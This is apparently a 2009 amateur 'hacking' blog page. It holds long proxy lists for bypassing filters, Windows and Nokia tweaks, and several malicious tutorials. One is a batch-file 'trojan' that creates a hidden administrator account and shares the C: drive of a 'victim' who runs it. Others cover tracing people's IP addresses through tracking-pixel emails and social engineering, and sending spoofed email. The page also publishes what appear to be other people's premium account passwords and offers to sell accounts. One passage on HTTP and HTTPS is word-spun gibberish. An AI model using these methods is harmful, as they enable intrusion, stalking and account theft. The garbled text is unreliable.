http://www.proxymouse.com
http://www.surfonym.com/cgi-bin/nph-proxy
http://www.superproxy.be/browse.pl
http://www.websiteguru.com/mrnewguy
http://www.letsproxy.com
http://www.fsurf.com
http://indianproxy.com
http://www.letmeby.com
http://Boredatschool.net
http://www.ibypass.org
http://www.ipzap.com/
https://proxify.biz
http://kproxy.com/index.jsp
http://www.attackcensorship.com/attack-censorship.html
http://mrnewguy.com
http://www.evilsprouts.co.uk/defilter
http://www.proxify.info
http://www.torify.com
http://www.switchproxy.com
http://www.proxifree.com
http://www.secure-tunnel.com/
http://www.proxify.cn
http://www.arnit.net/utilities/webproxy/new
http://www.proxify.co.uk
http://www.betaproxy.com
http://www.proxify.org
http://www.proxychoice.com
http://www.proxysnail.com
http://www.anonypost.com
http://www.thestrongestlinks.com
http://www.hujiko.com
http://www.anonproxy.info
http://www.peoplesproxy.com
http://www.freeproxy.us
http://www.proxyweb.net
http://www.nopath.com
http://urlencoded.com
http://www.pole.ws
http://www.browseany.com
http://www.spiderproxy.com
http://www.clickcop.com
http://www.sneakysurf.com
http://www.mywebtunnel.com
http://www.thewebtunnel.com
http://www.3proxy.com
http://www.yourfreeproxy.com
http://www.proxy7.com
http://www.fireprox.com
http://www.stupidcensorship.com
http://www.letsproxy.com
http://www.sneak2.com
http://www.cecid.com
http://www.freeproxy.ca
http://www.ibypass.org
http://www.goproxing.com
http://www.projectbypass.com/
http://www.ipsecret.com
http://www.nomorelimits.net
http://www.proxify.de
http://www.bywhat.com
http://www.snoopblocker.com
http://www.anonymizer.ru
http://www.proxyking.net/
http://www.perlproxy.com
http://www.proxylord.com
http://tntproxy.com
http://satanproxy.com
http://zombieinvasion.info
http://demonproxy.com
http://www.myfreeproxy.com
http://www.gezcem.com/nph-proxy.pl.old
http://mpleger.de
http://www.the-cloak.com/login.html
i know having all dese names in ur mind is impossible.
do 1 thinng only memorise
proxy.org and proxy4free.com
summary of d chapter.
[1]proxy is done 4 being safe while doing illegal stuffs nd 4 bypassing firewalls.it is a very good option 2 download multiple files 4m rapidshare at any single moment.
[2]get proxy server lists nd apply these address in ur browser 2 surf d web anonymously

i think i have well explained proxy

MY COURES OF HACKING STARTS FROM IP ADDRESS:- all about ip address


MY COURES OF HACKING STARTS FROM IP ADDRESS
IP ADDRESS STANDS for internet protocol address.
your ip address is d unique address on vch data r sent 2 you.
ur internet service provider make hisself sure dt datas r going 2 u
bcoz he is sending data on d address specialy assigned 2 you

TRACING IP ADDRESS AND IT'S LOCATION

#############first we will trace ip address##############

----->HOW TO KNOW YOUR IP ADDRESS AND IP ADDRESSES CONECTED TO U
click on start,go on run,open run type cmd hit enter
a command prompt vl appear
write der
netstat -n
nd hit enter
a list vl appear..look at local address .d first local address is ur ip address. d second method 2 get ur ip address is open
whatismyip.com
on dis site u may easily know ur ip address.
writing netstat is more good dis command tells about all ip address vch r connected 2 u dis moment.

----->HOW TO KNOW THE IP ADDRESSES OF WEBSITES
click on start>run>type cmd>hit enter
write
tracert websitename
eg tracert www.orkut.com
hit enter
now some information vl come automatically
u vl see written der
"tracing route 2 wensite name[ip address of d website]"
nd then many more things.
yes nw u successfully got d ip address of d website.it is really very easy.

----->HOW TO KNOW THE IP ADDRESS OF A PERSON WHO HAS SENT U A MAIL
now dis trick is 4 tracing gmail,yahoomail,hotmail nd 4 all mail services.
4m dis technique[vch i am going 2 write down]u can trace all email's ip address.
first of all open
readnotify.com
register der.
now wenever u vl be needing to trace any 1 then compose a mail 2 him nd in email to section write
victim's emailid.readnotify.com
eg tushar_kesarwani@rediff.com.readnotify.com
{they won't see this}
nd send him d mail.wen he vl read ur mail ,a mail 2 ur readnotify wil go automatically nd by opening ur readnotify account der u can see dt person' ip adderess.
actually readnotify sends an automatic generated image vd ur mail nd dis hidden image gives u victim's ip address.
dis technique is very good.

----->HOW TO KNOW THE IP ADDRESS OF A PERSON WITH WHOM U R CHATING

see,here r some cases.some different cases nd u must hv 2 do different operation vd different massengers.
wait i am writing.
well,
in dis section first of all i ud like 2 remind u d working method of netsta -n command vch i wrote previously.
netstat command gives u d information of all the communication vch u r doing vd internet.i mean,suppose dt if u r connected 2 orkut nd g mail nd any porn site at a single instant then netstat tells u about all the 3 server's ip address.
this moment there r many massengers vch ppl use ,,,4 example--->icq massaneger,msn,yahoo massenger,g talk massenger nd many more ,ppl also use some sites like meebo.com 2 use masenger.
now der r some cases


>>>CASE [1]<<<>ur freind
ur freind---->you
well,this thing makes very easy 2 trace some1 while chating on icq massenger,wen u r chatting vd him then b4 of starting chatting just open run type cmd hite enter nd write
netstat -n
mind it ,till now u hv nt done started chatting vd him,now many ip address will come,simpally note down them somewhere,
now start chatting vd him,
nd while chatting vd him
again open run,type cmd hit enter nd type
netsta -n
now u vl see,a new id address.
bingo,now u hv got d ip address of ur freind.


>>>CASE [2]<<<>massenger's server------>ur freind
if u vl do d previous operation then u vl find massenger's ip addres.
here,u may use social eengineering,
social eengineering mans making some1 fool nd hacking him,
in dis masenger case[mind it most of d massenger follow dis way]simpally say ur freind 2 send a file or 2 recieve a file,if he agrred then just do previous operation OF netstat -n .
when he vl send u d file then it vl nt come thru massenger ,it vl directly come 2 u nd by writing netstat -n,u may find 1 more ip address dt is of ur freind.
or der's a 1 more method,u may say him 2 mail you or write a mail 2 him nd use readnotify thing,vch i told previously nd now wen he vl send u mail or wen he vl reply 4 ur mail,u can get his ip address.
confused


>>>CASE [3]<<<
TRACING SOME1 WHILE CHATTING ON MEEBO.COM TYPE ONLINE MASSENGERS.
,
here's no method 2 trace him apart of saying him 2 send a mail 2 you or u may send him a mail nd wen he vl reply u vl get or u may say him 2send u a file.
dt's it.


############now we will trace location#############
this is the simplest thing i know
just go to ip2location.com
and enter there the ip address of victim
u will get everything

important notice


now i m going to teach hacking frm the very basic

so start following my blog daily

Wednesday, June 10, 2009

Keeping you'r computer cleaner + faster by tushar


Keeping you'r computer cleaner + faster by tushar

Desktop

If you want your computer to load faster on startups I really recommend you to clean your desktop. If you have many icons and stuff on your desktops it takes much longer to load than if you only have a few things.
So my tip to you is to clean off nearly every icon. It doesn't take much longer to go to the start menu and find the program you want to use.
Aswell as if you have folder and files on your desktop. Put them somewhere else.

%temp%

The %temp% is not hard at all to clean and in some cases it can make your computer faster.
Here is how you clean it:
Go to Start > Run and then you type %temp% and hit the enter button.
A new window will pop-up, in that window delete everything and then close it.
If you can't delete everything just leave it then.

Disk Defrag

If you want your harddrives to go faster then I recommend you to disk defrag. Windows already have a disk defrager but I recommend you to use Auslogics Disk Defrager.
You can download it from here.

Uninstall Programs Correctly

Many people use Windows Remove and add programs, but the bad thing about it is that It doesn't delete the registry files after you uninstalled a program. This could accually make your computer a little slower so how can you delete the registry files?
The answer is very easy. It's a tool called revo uninstaller wich cleanes up everything after you uninstalled a program and it uninstalles programs aswell for you.
You can download Revo Uninstaller from here.

Startups

If you want your computer to go faster on startup you can clear your startup programs. What you do is simple. You just tell the program to not start att the startup. And how to do it is also simple:
Go to Start > Run and type msconfig and hit the enter key.
Go to Startup and clear the programs you don't want to start when your windows starts.
If you don't know if you need the program to start up or not you can check it out here, aswell as you can check if there is a trojan or any other unwanted stuff that startup.

Tools/Programs

Ccleaner
Cclenaer is a very easy to use and a fast tool. What Ccleaner simply does it that it repairs the registry keys and clear temp files and internet files such as cookies and much more. Ccleaner is a free tool and you can download it from here.

Glary Utilites
Glary Utilites is a program that is like Ccleaner. Put it has more functions. Glary Utilites can clean Temp files and internet files, repair registry, clear empty folder, serach for dangerus startups and spyware, look for harddrive errors and much more. Glary Utilites cost money but there is a free version out there. You can download the free version from here.

ATF-Cleaner
ATF-Cleaner is a tool that clear files that slows the computer. For example temp files and internet cookies and stuff like that. ATF-Cleaner is really easy to use and fast aswell as it is totally free.
You Can download ATF-Clenaer from here.

Tune-Up utilites
Tune-Up utilites is my favorite along with Glary Utilites. Tune-Up utilites can clear alot of disk space if you want it to. Tune-Up can look for disk errors, undelete files, delete cookis / temp files, fix registry and much much more. Tune-Up utilites cost money but you can download it from rapidshare here.

============================
Thanks for reading this guide.

Tuesday, June 9, 2009

Rapidshare Account for all


Rapidshare Account for all

accountid=9007192
password=yv7TXL
Expiration date: Mon, 29. Jun 2009

if u want secured or unsecured acc then contact me at
tushar.kesarwani2@gmail.com

i garauntee my rate will be cheepest in the whole of world

note: if u want it for free then watch my blog daily i will post when i will feel good and do click on all the adds(click only once)

Sunday, June 7, 2009

Speeding up Mozilla Firefox!


Speeding up Mozilla Firefox!
We are getting here to the hidden configuration settings to set the firefox to request more data that it usually does!* Type about:config into the URL Bar and hit ENTER.* Scroll down and look for the following entries:
1) network.http.pipelining.
2) network.http.proxy.pipelining.
3) network.http.pipelining.maxrequests.
*Normally, the browser will make one request to a web page at a time, when you enable pipelining it will make several at once, which really speeds up page loading.*
Alter the entries as follows:
1) Set network.http.pipelining to true
2) Set network.http.proxy.pipelining to true
3) Set network.http.pipelining.maxrequests to some number like 30.
This means it will make 30 requests at once.*
Lastly, right-click anywhere and select New--> Integer.* Name it nglayout.initialpaint.delay and set its value to 0. This value is the amount of time the browser waits before it acts on information it receives.Please do all this very carefully! and if got trouble call me at 9453030478

Speeding up Internet Explorer!


Speeding up Internet Explorer!
* Open registry editor by going to Start --> Run --> regedit.* In registry editor, navigate to key HKEY_CURRENT_USER --> Software --> Microsoft --> Windows --> CurrentVersion --> Internet Settings.* Click on edit --> New --> DWORD.* Type MaxConnectionsPerServer --> You can set value (the more higher the no, the more good speed u get, e;g : 99). [99 in hexadecimal, So 153 in decimal]* Create another DWORD.* Type MaxConnectionsPer1_0Server.* Then put a high value as mentioned above.* Restart Internet Explorer and you are done.

Speeding up Net Browsing!


Speeding up Net Browsing!
* Open Start --> Run --> type gpedit.msc.* You will see Local Computer Policy.* Expand the Administrative Templates Branch.* Expand the Network Branch.* Highlight QoS Packet Scheduler.* Double-click Limit Reservable Bandwidth.* Check Enabled.* Change Bandwidth limit [%] to 0%.* Click Apply and then OK and then Restart.

RAM Cleaning with Notepad!


RAM Cleaning with Notepad!
You may recognise that your system gets slower and slower when playing and working a lot with Your PC. That's because your RAM is full of remaining progress.* Create a new Notepad file on your desktop.* Rename it as RAMcleaner.* Type FreeMem=Space(64000000) in this text file.* Save it as RAMcleaner.vbs [You may choose the All Files option when u save it]* Run the file and your RAM may be cleaned.* Of course you can edit the code in the file for a greater cleaning-progress. eg:, FreeMem=Space(1280000000) and then Save it.

Multiple Login in Yahoo!


Multiple Login in Yahoo!
* Go to Start menu --> Run --> Type regedit.* Go to HKEY_CURRENT_USER -->> Software --> Yahoo --> pager -->Test.* On the right pane, right-click and choose new DWORD value .* Rename it as Plural.* Double click and assign a decimal value of 1.* Now close Registry Editor and restart Yahoo! Messenger.* For signing in with new ID open another Messenger .

Multiple Login in Google Talk!


Multiple Login in Google Talk!
* Create a shortcut of your Google talk.* Right click the shortcut --> choose Properties.* In the Target you will find this "C:\Program Files\Google\Google Talk\googletalk.exe".* Now at the end of target add this /nomutex. It should be like this "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex. There should be a space after googletalk.exe"* Thats it, click OK and you can open more than one Google talk.

Testing Anti-Virus!


Testing Anti-Virus!
* Open Notepad and copy the Code given below.* The text should be in one horizontal line.* Then save file as "eicar.com" including quotation-marks.X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H** After some seconds saving this file, your Anti-Virus should come with the message that this file is infected with virus asking permission for its deletion/clean.* This file is secure and its not going to infect your computer in whatever way. It is a standard text developed by the European Institute for Computer Anti-virus Research (EICAR). Every Anti-Virus is programed to load this file as a virus.* If your Anti-Virus will not hack this file as a virus, a program will appear as DOS window with this text EICAR-STANDARD-ANTIVIRUS-TEST-FILE.* If this happens then you should probably find some other Anti-Virus up to date. It means that your PC might already being infected from viruses and your current Anti-Virus do not recognize them.

Customising Logon with your own words!


Customising Logon with your own words!
This tip won't make your computer any faster but may help personalize your computer experience.* Open Registry Editor by going to Start menu, Run and type regedit.* Click on HKEY_LOCAL_MACHINE --> SOFTWARE --> Microsoft --> Windows NT --> CurrentVersion--> Winlogon.* In right pane, look for key by the name LogonPrompt.* Set its value to whatever text you want to see displayed at login screen.* Click on OK or Save.

Starting Movie in Paint


Starting Movie in Paint!
* First start a movie in any player.* Then open Paint.* Now, in the player when the movie is being played, press Print screen button on your key board.* Now, Press ctrl+v in Paint* Leave the Movie player open and don't minimize it.* Open Paint now and see the movie in the Paint!

Changing name of Internet Explorer!


Changing name of Internet Explorer!
* Open Registry Editor by going to Start menu, Run and type regedit.* Click on HKEY_CURRENT_USER --> Software --> Microsoft --> Internet. Explorer --> Main.* In the Right Panel look for the string Window Title and change its value as you wish.* If the String value is not there create a New String value and assign the value as your wish.* Click on OK.

lockfolder without any software


* Open Notepad and Copy and Paste the below code and save as locker.bat.* Edit your Password in the code in the 23rd line. It's written there "Type your Password here".* Erase the Quotation Marks and erase "Type your Password here" and type a new Password.* At first time when you click on locker.bat, it will create folder named Locker automatically for you.* After creation of Locker folder, again click on the locker.bat.* It will ask for locking the folder, Press Y.* Locker folder will now be disappeared.* Again to get it, click on locker.bat. It will ask for your Password.* Type your Password and the folder will be back again.* If you want to change the name of Locker, then edit the each and every Locker written in the Script.cls@ECHO OFFtitle Folder Lockerif EXIST "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" goto UNLOCKif NOT EXIST Locker goto MDLOCKER:CONFIRMecho Are you sure u want to Lock the folder(Y/N)set/p "cho=>"if %cho%==Y goto LOCKif %cho%==y goto LOCKif %cho%==n goto ENDif %cho%==N goto ENDecho Invalid choice.goto CONFIRM:LOCKren Locker "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"attrib +h +s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"echo Folder lockedgoto End:UNLOCKecho Enter password to Unlock folderset/p "pass=>"if NOT %pass%=="Type your Password here" goto FAILattrib -h -s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"ren "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" Lockerecho Folder Unlocked successfullygoto End:FAILecho Invalid passwordgoto end:MDLOCKERmd Lockerecho Locker created successfullygoto End:End

Drive Lock!


Drive Lock!
* Go to Start --> Run.* Open Registry Editor by typing regedit.* Now, go to HKEY_CURRENT_USER --> Software --> Microsoft --> Windows --> CurrentVersion --> Policies --> Explorer.* In the right pane create a new DWORD item and name it NoDrives(it is case sensitive).* Modify it's value and set it to 3FFFFFF (Hexadecimal).* Now restart your computer.* So, now when you click on My Computer, no drives will be shown - All Gone.* To enable display of drives in My Computer, simply delete this DWORD item that you created.* Again restart your computer.* You can now see all the drives again.

here is the megashare.com Premium Account


Username: lucasvojt@gmail.com
Password: 449702d87e441

Username: beast_760@hotmail.com
Password: 4499610eedca8

rapidshare premium acc


Login: 9528555
Pass: abcde

Tuesday, June 2, 2009


first off all join ma community on orkut
http://www.orkut.co.in/Main#Community.aspx?cmm=42897260

Folder Option Vanishes


Folder Option Vanishes..
Most of us are accustomed to the above problem in Windows XP
Here's how you can get Folder Options back..

Method 1:

1: Open Start menu and from there select Run

2: type gpedit.msc and hit enter

3: now in the Group Policy window, from the left pane, select user configuration->Administrative Tempelates->windows components->Windows Explorer by highlighting it with the mouse cursor..

4: now in the right side you will see an option which says "Removes the Folder Options menu item from the Tools menu"

5: right click on this option and select properties

6: now in the properties under Setting tab, select Disabled and hit OK

Making A FILE of the ANY SIZE you want


Making A FILE of the ANY SIZE you want..
How to make a file of the size you want ?

Let us assume you want to make a file of size 10000kbConvert it to bytes -> 10000*1024 which comes out to be 10240000 bytes
Open calculator (win key+r -> type in calc )
Choose view mode to be Scientific one
Type in 10240000 and convert it to hex it comes out to be 9C4000
Convert this value to 8 digits by padding zeroes to its left
-> so finally it comes out be 009C4000
Open Command Prompt (win key + r -> type in cmd )
Type DEBUG filename.datit'll show file not found error ,ignore itType
RCX -> Enter -> then last four hexadecimal numbers
i.e. 4000 ->EnterType RBX -> Enter -> then first four hexadecimal numbers
i.e. 009C->EnterType W ->EnterType Q ->EnterW stands for write and Q for quitNow check the file you just made by dir command ->dir filename.dat
Using the same technique you can make files as big as you want.

Change the Default location for Installing Applications


Change the Default location for Installing Applications
As the size of hardrives increase, more people are using partitions to seperate and store groups of files.

XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.

Run the Registry Editor (regedit)and go to

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.

Know who used your PC in your ABSENCE It's really simple


Know who used your PC in your ABSENCE It's really simple:

Go to

start > run >eventvwr.msc

Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.



double click on the eg: info n it will show u the detail.

You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day

see who is invisible in yahoo messenger


The following two tricks lets you see who is invisible in yahoo messenger.without his or her knowing that you are aware of his or her presence. This is a working trick.

Trick 1

1. Open the conversation window of the person..whom you suspect to be online.

2. click on IMvironments. Find doodle from the imvironments. Click on it

3. you will see a screen.."Waiting for your buddy to load doodle"....Wait sometime

4. After sometime if it is able to load....it means your so called buddy is online and he or she doesn’t want to talk to you..

5. if it doesn’t load....you can be sure that he or she is really offline

TRICK 2

1. Open the chat window of the person whom u suspect to b online....or we can say invisible

2. Click on the conference button on the top left.

3. Then invite him for voice conference.....

4. There are 2 possibilities. If after sometime the conference window says..."Voice chat could not be started"........This implies that your buddy is really offline

5. If after sometime the conference window opens....notice the """Talk""" button.....if it turns green,...that means the person is online and invisible

accessing a Web page from any browser address bar


Here's a cool tip for accessing a Web page from any browser address bar. You can enter any string of characters in an address bar and then press the below provided keys; the browser will automatically add both "www" and ".com", ".net",".org" and then search for the page on the Internet.

For example, if we type
http://seriosblogger.blogspot in an address bar and then

1) press Ctrl + Enter, browser will redirect us to the
http://seriosblogger.blogspot.com/ site..

2)press Shift + Enter,browser will redirect us to the
http://seriosblogger.blogspot.net/ site..

3)press Shift + Ctrl + Enter,browser will redirect us to the
http://seriosblogger.blogspot.org/ site

INCREASE DOWNLOAD SPEEDS BY 100 - 200 kb/sec


First of all download this wonderful program:

http://www.speedguide.net/files/TCPOptimizer.exe

Then when u start the program go to Settings the Select Cable modem or DSL, whatever you have.

Go to MaxMTU and set it to 1500 this is optimal anything above this will not work as well.

That's about it!! Now, ENJOY the speed!!

trick for free zone rapidshare users


This is 4 free zone users--

Downloading FREE from RAPIDSHARE IS often a headache due to the time delay for FREE downloaders!!!

HERE IS A SOLUTION TO THAT PROBLEM

>>> Click a Download link for Rapidshare !

>>> Click the Free button on Rapidshare Page !

>>> Now as usual the timer starts !!!

>>> Now, go to the address box of your browser.
(Where you type the websites !)

>> In the address box type: javascript:alert(c=0)

>> Click OK on the alert box that arises
UR PROBLEM IS SOLVED........and if it is not solved then don't worry i will give u a free premmium acc......

NOKIA (S60 SERIES PHONES) FULL FORMATTING EXPLAINED


[TRICK] NOKIA (S60 SERIES PHONES) FULL FORMATTING EXPLAINED

Follow the steps carefully for Full formatting of your S60 Series cellphone:

1. Make sure you have at least 3/4 charge of battery power left.
2. Backup your contacts list and personal files to MMC memory card.
3. Switch-off your phone.
4. Press and hold these 3 keys; Green dial key, * (star key) and no. 3 key and then press the power on/off to switch on the phone.

Remember, do not let go all of the keys, hold until you see a formatting word screen show!

5. After a few minutes when the full phone formatting completed, your phone will be back to original system and factory settings.


Normal Reset *#7780# : Restores ini files from rom but preserves user data (photos, 3rd party apps etc)
Hard Reset *#7370# : This reformats completely the C: drive. All applications and files stored on this drive will be lost and clean default files will be rewritten.

HOPE I AM CLEAR TO ALL.!

SECRET CODE for all NOKIA MOBILES


On the main screen type
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
#pw+1234567890+1# Shows if sim have restrictions.

*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart

If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345

Press *#3925538# to delete the contents and code of wallet.

Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin#

*#7328748263373738# resets security code.
Default security code is 12345



Secret codes for NOKIA CDMA

Name Set: *3001#12345#
Software Version: *#837#
Software Version: *#9999#
CDMA Mode : *#7738#

Know the difference between http:// & https://


Know the difference between http:// & https://

HTTP stands for HyperText Transport Protocol, which is aloof a adorned way of adage it’s a agreement (a language, in a address of speaking) for advice to be anesthetized aback and alternating amid web servers and clients.

The important affair is the letter S which makes the aberration amid HTTP and HTTPS.
The S (big surprise) stands for “Secure”.
If you appointment a website or webpage, and attending at the abode in the web browser, it will acceptable activate with the following: http://.
This agency that the website is talking to your browser application the approved ‘unsecure’ language. In added words, it is accessible for addition to “eavesdrop” on your computer’s chat with the website. If you ample out a anatomy on the website, addition ability see the advice you accelerate to that site.This is why you never anytime access your acclaim agenda cardinal in an http website! But if the web abode begins with https://, that basically agency your computer is talking to the website in a defended cipher that no one can eavesdrop on. You accept why this is so important, right? If a website anytime asks you to access your acclaim agenda information, you should automatically attending to see if the web abode begins with https://. If it doesn’t, there’s no way you’re activity to access acute advice like a acclaim agenda number!

Windows Important COMMANDS


Windows Important COMMANDS
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Microsoft Movie Maker - moviemk
Microsoft Powerpoint (if installed)- powerpnt
Microsoft Word (if installed)- winword
Microsoft Syncronization Tool - mobsync
Mouse Properties - control mouse,main.cpl
Netmeeting - conf
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Object Packager - packager
ODBC Data Source Administrator- odbccp32.cpl
On Screen Keyboard - osk
Outlook Express - msimn
Paint – pbrush
Keyboard Properties - control keyboard
Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools - control admintools
Bluetooth Transfer Wizard - fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop,desk.cpl
Display Properties (w/Appearance Tab Preselected) - control color
Dr. Watson System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier
Event Viewer - eventvwr.msc
File Signature Verification Tool - sigverif
Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Game Controllers - joy.cpl
Group Policy Editor (XP Prof) - gpedit.msc
Iexpress Wizard - iexpress
Indexing Service - ciadv.msc
Internet Properties - inetcpl.cpl
IP Configuration (Display Connection Configuration) - ipconfig /all
IP Configuration (Display DNS Cache Contents) - ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) - ipconfig /flushdns
IP Configuration (Release All Connections) - ipconfig /release
IP Configuration (Renew All Connections) - ipconfig /renew
IP Configuration (Refreshes DHCP & Re - Registers DNS) -ipconfig /registerdns
IP Configuration (Display DHCP Class ID) - ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) - ipconfig /
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert
System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information - msinfo32.
System Properties - sysdm.cpl
Task Manager – taskmgr
User Account Management- nusrmgr.cpl
Windows Address Book Import Utility - wabmig
Windows Backup Utility (if installed)- ntbackup
Windows Firewall- firewall.cpl
Windows Magnifier- magnify
Windows Management Infrastructure - wmimgmt.msc
Windows Media Player - wmplayer
Windows Messenger - msmsgs
Windows Picture Import Wizard (need camera connected)- wiaacmgr
Windows XP Tour Wizard - tourstart
Wordpad - write
Performance Monitor - perfmon.msc
Phone and Modem Options - telephon.cpl
Phone Dialer - dialer
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder – printers
Private Character Editor - eudcedit
Regional Settings - intl.cpl
Registry Editor - regedit
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Private character editor = eudcedit.exe (allows creation or modification of characters)
Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).
Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).
ODBC Data Source Administrator = odbcad32.exe (something to do with databases)
Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).
Program Manager = progman.exe (Legacy Windows 3.x desktop shell).
Remote Access phone book = rasphone.exe (documentation is virtually non-existant).
Network shared folder wizard = shrpubw.exe (creates shared folders on network).
File siganture verification tool = sigverif.exe
Volume Control = sndvol32.exe
System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).
Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).
Microsoft Telnet Client = telnet.exe
Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).
Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).
Certificate Manager - certmgr.msc
Component Services - dcomcnfg
Regional Settings - intl.cpl
Telnet Client - telnet
User Account Management - nusrmgr.cpl
Utility Manager - utilman
Windows Address Book - wab
Windows Management Infrastructure - wmimgmt.msc
Windows Media Player - wmplayer
Windows Messenger - msmsgs
Windows System Security Tool - syskey
Windows Update Launches - wupdmgr
Windows Version - winver
Windows Address Book Import Utility - wabmig

hacking someones computer


Making your own trojan in a .bat file Open a dos prompt we will only need a dos prompt and windows xp operating system

-Basics-

Opening a dos prompt -> Go to start and then execute and type
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that will execute as commands.
Open notepad and write there:

dir
pause

And now save this as test.bat and execute it.
Funny ain't it ?

---------------------- Starting -------------------
-:Server:-

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.

Command #1-> net user prudhvi /add
What does this do? It makes a new user called prudhvi you can put
any name you want

Command #2-> net localgroup administrators prudhvi /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.

Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.
-!extras!-
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.

Command #1 -> net use \\victimip neo
This command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.
Command #2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C:/ drive with administrators access!!!

SEND EMAIL FROM ANYONE


SEND EMAIL FROM ANYONE

open funmaza.com
click on funmailer
nw write d person's mail id 4m vch id u wanna send d mail....
that all

open your blocked sites


Just open the any of the sites below and enter the URL of the blocked site..It will automatically redirect to your blocked site.!!

https://ssltube.com
http://www.latestgroove.info
http://www.mydietchart.info
http://www.degreenlaw.info
http://www.revisionforum101.info
http://www.unblockable.co.uk
http://www.escapehatch.info/
http://www.citric101.info/
http://www.revisionlookup.info/
http://www.silentsurfer.info/
http://www.heavyarmour.info/
http://www.stealthextraction.info/
